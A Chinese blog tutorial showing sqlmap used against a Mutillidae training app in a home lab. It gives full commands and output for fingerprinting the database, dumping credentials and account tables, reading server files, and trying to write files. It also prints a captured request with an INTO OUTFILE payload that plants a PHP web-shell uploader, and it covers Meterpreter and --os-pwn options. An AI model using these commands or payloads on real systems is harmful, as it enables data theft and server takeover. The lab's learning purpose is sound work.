Mutillidae品台上使用sqlmap注入测试

最新推荐文章于 2024-05-16 20:28:16 发布
最新推荐文章于 2024-05-16 20:28:16 发布
阅读量147 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43304436/article/details/130776888
版权
Mutillidae是一个开放源码的提供安全渗透测试的Web应用程序, Mutillidae可以安装在Linux、windows xp、windows 7等平台上。下载及安装说明文档详见: mutillidae安装 在owasp top 10选项中,我们可以看到很多提供测试的页面. 这里随便选取一个sql injection地址进行测试.本文紧紧是介绍 sqlmap注入工具的常用参数使用方法,参考文档: sqlmap说明文档 本地环境,虚拟机win2k3搭建好Mutillidae. 虚拟机backtrack5 r3进行sqlmap测试。
Using sqlmap for sql injection
获取数据库类型版本信息
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.2/mutillidae/index.php?page=login.php --forms --batch -p username -f --dbms=mysql -b --flush-session --level=5 --risk=3 -v 1
返回结果: 
web server operating system: Windows
web application technology: Apache 2.4.3, PHP 5.4.7
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               html error message fingerprint: MySQL
banner:    '5.5.27'

#参数说明:
--forms       #测试url表单(因为这里测试的是一个登录框,post型的注入测试,其他方法往下看)
--batch       #使用默认,不要求用户输入
-p            #指定可测试的参数
-f            #指纹识别数据库类型
--dbms        #指定数据库管理系统
                MySQL
                Oracle
                PostgreSQL
                Microsoft SQL Server
                Microsoft Access
                SQLite
                Firebird
                Sybase
                SAP MaxDB
-b            #获取数据库版本信息
--level=(1-5) #要执行的测试水平等级,默认为1
--risk=(0-3)  #测试执行的风险等级,默认为1
-v            #详细的等级(0-6) 
               0:只显示Python的回溯,错误和关键消息。
               1:显示信息和警告消息。
               2:显示调试消息。
               3:有效载荷注入。
               4:显示HTTP请求。
               5:显示HTTP响应头。
               6:显示HTTP响应页面的内容  
--flush-session #Flush session file for current target.刷新Session file

#tips
#如果手工测试可以判断出sql注入类型可以用--technique参数提高效率,默认是B:
    B: Boolean-based blind SQL injection
    E: Error-based SQL injection
    U: UNION query SQL injection
    S: Stacked queries SQL injection
    T: Time-based blind SQL injection
--technique=E
-s    #保存和恢复Session file 指定一个不同的路径
获取当前数据库用户名及数据库名
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --current-user --current-db --flush-session --technique=E --level=5 --risk=3 -v 1 
#返回结果:
[02:49:56] [INFO] fetching current user
[02:50:01] [INFO] retrieved: root@localhost
current user:    'root@localhost'

[02:50:01] [INFO] fetching current database
[02:50:05] [INFO] retrieved: nowasp
current database:    'nowasp'

#参数说明:
--current-user  #获取当前数据库用户名称
--current-db    #获取当前数据库名称

#tips
#判断当前数据库用户权限:
--privileges -U 用户名
--is-dba -U 用户名
获取所有数据库及用户和密码hashes
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --users --passwords --dbs --technique=E --level=5 --risk=3 -v 1 
#返回结果:
database management system users [59]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [2]:
    password hash: NULL
    password hash: NULL
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

#参数说明:
--users         #列出数据库所有用户
--passwords     #列出数据库所有用户密码hashes
--dbs           #列出所有数据库

#tips
#如果要读取指定用户的密码hash:
--passwords -U root
列出指定数据库中的表名
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --tables -D nowasp --technique=E --level=5 --risk=3 -v 1 
#返回结果:
Database: nowasp
[7 tables]
+----------------+
| accounts       |
| balloon_tips   |
| blogs_table    |
| captured_data  |
| credit_cards   |
| hitlog         |
| pen_test_tools |
+----------------+

#参数说明:
--tables        #获取数据库中所有表名
-D              #指定数据库名
列出指定数据库表项的所有字段名
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --columns -D nowasp -T accounts --technique=E --level=5 --risk=3 -v 1 
#返回结果:
Database: nowasp
Table: accounts
[5 columns]
+-------------+------------+
| Column      | Type       |
+-------------+------------+
| cid         | int(11)    |
| is_admin    | varchar(5) |
| mysignature | text       |
| password    | text       |
| username    | text       |
+-------------+------------+

#参数说明:
--columns       #列出表中所有字段名
-T              #指定数据库表名
获取指定字段数据(脱裤)
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --dump -D nowasp -T accounts -C "username,password" --technique=E --level=5 --risk=3 -v 1 
#返回结果:
Database: nowasp
Table: accounts
[16 entries]
+----------+--------------+
| username | password     |
+----------+--------------+
| kevin    | 42           |
| admin    | adminpass    |
| john     | monkey       |
| jeremy   | password     |
| bryce    | password     |
| jim      | password     |
| bobby    | password     |
| simba    | password     |
| dreveil  | password     |
| scotty   | password     |
| cal      | password     |
| john     | password     |
| ed       | pentest      |
| samurai  | samurai      |
| dave     | set          |
| adrian   | somepassword |
+----------+--------------+

#参数说明:
--dump          #dump数据库表项
-C              #指定字段名

#tips
--start 2 --stop 4  #dump一个范围类的数据(配合--dump使用). 如:
此语句加上参数--start 2 --stop 4返回:
+----------+-----------+
| username | password  |
+----------+-----------+
| admin    | adminpass |
| john     | monkey    |
| jeremy   | password  |
+----------+-----------+
--dump-all      #dump所有数据库表项
--replicate     #Replicate dumped data into a sqlite3 database
读取指定文件
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch -p username --file-read "c:/boot.ini" --technique=E --level=5 --risk=3 -v 1 
#返回结果:
[boot loader]\r
timeout=30\r
default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\r
[operating systems]\r
multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fa
c:/boot.ini file saved to:    '/pentest/database/sqlmap/output/192.168.1.3/files/c__boot.ini'

#参数说明:
--file-read    #读取系统指定文件
上传本地文件
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --forms --batch --file-write "/tmp/test.txt" --file-dest "F:/xampp/htdocs/mutillidae/test/test.php" --technique=E --level=5 --risk=3 -v 4 
#返回结果:
[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server

#参数说明:
--file-write   #上传本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
--file-dest    #上传到的绝对路径

#tips
--proxy=http://localhost:8080  #如使用burpsuite时代理端口配置
--prefix "a'" --suffix "or 'a'='a"   #

这里针对post提交的测试未成功 可以-v 4看看HTTP请求 GET?. --os-shell -v 4得到提交limit 1 into outfile语句 截取一段解码后如:

POST /mutillidae/index.php?page=login.php HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.3
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-25eca9d (http://sqlmap.org)
Cookie: showhints=0;PHPSESSID=qvel8iet1d713f4q00n8gr60s6
Connection: close

username=a' LIMIT 1 INTO OUTFILE 'C:/xampp/htdocs/mutillidae/includes/tmpuptvk.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\xampp\\htdocs\\mutillidae\\includes> <input type=submit name=upload value=upload></form>";}?> -- or 'a'='a&password=&login-php-submit-button=Login

我这木测试成功 可以使用burpsuite抓包修改post数据提交或者wireshark配合tcpdump nc提交试试
sqlmap --cookie注入测试
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=capture-data.php --cookie="page = capture-data.php\r\nshowhints = 1\r\nPHPSESSID = m565a24c08ld1uheri0rpnqqt3\r\n" --dbs --level=5 --risk=3 -v 4 
#返回结果:
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

#参数说明:
--cookie       #HTTP Cookie header

#tips
--cookie-urlencode  #URL Encode generated cookie injections
--string            #指定关键词,字符串匹配. 也可以用--regexp
sqlmap --auth-type and --auth-cred认证注入测试
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --auth-type Basic --auth-cred "admin:adminpass" --dbs --level=5 --risk=3 -v 4 
#返回结果:
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
#这里就拿前面dump出的数据进行测试

#参数说明:
--auth-type      #HTTP身份验证类型(Basic, Digest or NTLM)
--auth-cred      #HTTP身份验证凭据(name:password)

#tips
--auth-cert      #客户端证书key_file,cert_file.
结合Metasploit’s Meterpreter注入
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --os-pwn --msf-path=/opt/framework/msf3 --priv-esc --technique=E --level=5 --risk=3 -v 1 
#返回结果:
自行测试 

#参数说明:
--os-pwn          #Prompt for an out-of-band shell, meterpreter or VNC
--msf-path        #matesploit绝对路径
--priv-esc        #Database process' user privilege escalation

#tips
--os-smbrelay     #One click prompt for an OOB shell, meterpreter or VNC
--os-bof          #Stored procedure buffer overflow exploitation
--tmp-path=TMPPATH  #Remote absolute path of temporary files directory
其他参数配合使用
#编码
--tamper=TAMPER    #Use given script(s) for tampering injection data 如:
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py

#读取注册表项值
--reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

#操作数据库
--sql-shell         #提供一个交互的sql shell
--sql-query=QUERY   #执行sql语句

#查资料看见有用-z,根据参数及结果可以了解哈
-z "ign,flu,bat,ban"
返回:
web server operating system: Windows
web application technology: Apache 2.4.3, PHP 5.4.7
back-end DBMS: MySQL 5.0
banner:    '5.5.27'

#对于需要暴力猜表字段类的 如mysql4,在/pentest/database/sqlmap/txt下存放这字典可以自行添加
common-columns.txt  common-tables.txt  smalldict.txt    wordlist.txt
common-outputs.txt  keywords.txt       user-agents.txt

#tips
--threads  #设置线程
--user-agent=AGENT  #HTTP User-Agent header
--random-agent      #Use randomly selected HTTP User-Agent header
--referer=REFERER   #HTTP Referer header
......
sqlmap post型注入其他方法:
1.使用burpsuite抓包获取提交的参数信息保存为post-sql.txt,然后执行:
root@bt:/pentest/database/sqlmap# python sqlmap.py -r /root/Desktop/post-sql.txt -p username --dbs --text-only --level=5 --risk=3 -v 3
2.使用--data参数执行:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://192.168.1.3/mutillidae/index.php?page=login.php --data="username=&password=&login-php-submit-button=Login" -p username --batch --threads=10 --dbs --level=5 --risk=3 -v 3
转自: http://www.hackdig.com/?03/hack-2033.htm
明月嫣然-疏桐-暖阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
热门推荐
杨秀璋的专栏
07-18 1万+
这是最近学习渗透和网站攻防的文章,希望能深入地学习这部分知识,自己作为一个初学者,前一篇文章从数据库原理解读了防止SQL注入,这篇文章通过SQL MAP工具简单介绍其用法及原理,自己仍在慢慢探索网络攻防和渗透,希望文章对你有所帮助,尤其是学习网络安全的初学者,如果文章中存在错误或不足之处,还请海涵~
Wordpress网站渗透测试(进阶详细思路)
weixin_51957047的博客
05-26 6188
web渗透测试,wordpress网站渗透测试思路
PHP的password_hash()使用实例
Just Code
10-23 929
一、前言PHP5.5 (PHP 5 &gt;= 5.5.0) 提供了许多新特性及Api函数,其中之一就是Password Hashing API(创建和校验哈希密码)。它包含4个函数:password_get_info()、password_hash()、password_needs_rehash()、password_verify()。 在PHP5.5之前,我们对于密码的加密可能更多的是采...
搭建Mutillidae使用sqlmap注入测试
积木网络
02-25 5493
目录 1Using sqlmap for sql injection 1.1获取数据库类型版本信息 1.2获取当前数据库用户名及数据库名 1.3获取所有数据库及用户和密码hashes 1.4列出指定数据库中的表名 1.5列出指定数据库表项的所有字段名 1.6获取指定字段数据(脱裤) 1.7读取指定文件 1.8上传本地文件 2sqlmap --cookie注入测试 3sqlma
password_hash/password_verify/(JAVA)
mollygogo的博客
01-18 3169
承接了一个新项目,需要继承旧的用户数据。 账号密码解密使用了\yii\base\Security::generatePasswordHash($password, $cost)方法。 generatePasswordHash($password, $cost = null) //php的生成密文 //默认的cost是13,是时间复杂度 return password_hash($password, PASSWORD_DEFAULT, ['cost' => $cost]); 账号密码解密使用
SQL注入漏洞之sqlmap自动注入
XZZbh的博客
09-19 356
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
sql注入学习笔记(4)--sqlmap注入心得
azraelxuemo的博客
07-06 1353
其实也不算心得吧,只是一点小小的体会,抛砖引玉 怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了 第一步,注入点 sql注入点最好的寻找方式就是用google,可以经常去google的exploit-db去寻找不错的注入点,这里我也分享一些吧 google查询语句 提取码:yupw 然后手动简单的测试一下,如果觉得像注入点的话就可以移入我们的sqlmap做进一步测试 当然我们也可以查一个网站下面的注入点,就直接在这些语句后面加一点限制比如说site:company.com .
sqlmap注入测试工具
07-11
SQL注入注入神器
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 520
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
python学习-使用pandas库分析excel表,并导出所需的表
SixSix的自留地
05-16 93
使用pandas库分析excel表中多个子表的数据
实战项目技术点(1)
qq_60396437的博客
05-15 1077
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
Unity 编辑器AssetDatabase用法详解
最新发布
明明明的博客
05-16 247
Unity 编辑器AssetDatabase用法详解
简述redis数据类型及应用场景
qq_45927587的博客
05-10 353
每种数据类型的选择应当基于具体的应用需求,比如是否需要排序、是否允许重复元素、是否需要执行集合运算等。Redis作为一种高性能的内存数据存储系统,提供了多种数据结构来满足不同场景下的需求。: 双向链表,可以做栈(LPOP/RPOP)、队列(LPUSH/RPOP)或实现发布/订阅模式。: 最基本的数据类型,可以存储字符串、整数或者浮点数等数据。支持原子性操作,如增、删、改、查。: 无序且不重复的字符串集合,支持集合运算如并集、交集、差集。: 用于存储键值对的集合,每个哈希可以存储多个字段-值对。
商场学习之微服务
weixin_47628141的博客
05-12 1081
搭建商场项目基本架构和curd,并配置基本的微服务功能
如何使用sqlmap进行sql注入验证
05-30
4. 使用sqlmap进行注入测试 具体步骤如下: 1. 安装sqlmap工具 在Linux系统中,可以使用以下命令进行安装: ``` $ sudo apt-get update $ sudo apt-get install sqlmap ``` 在Windows系统中,可以从sqlmap官网...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月嫣然-疏桐-暖阳

你的鼓励是我开源的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值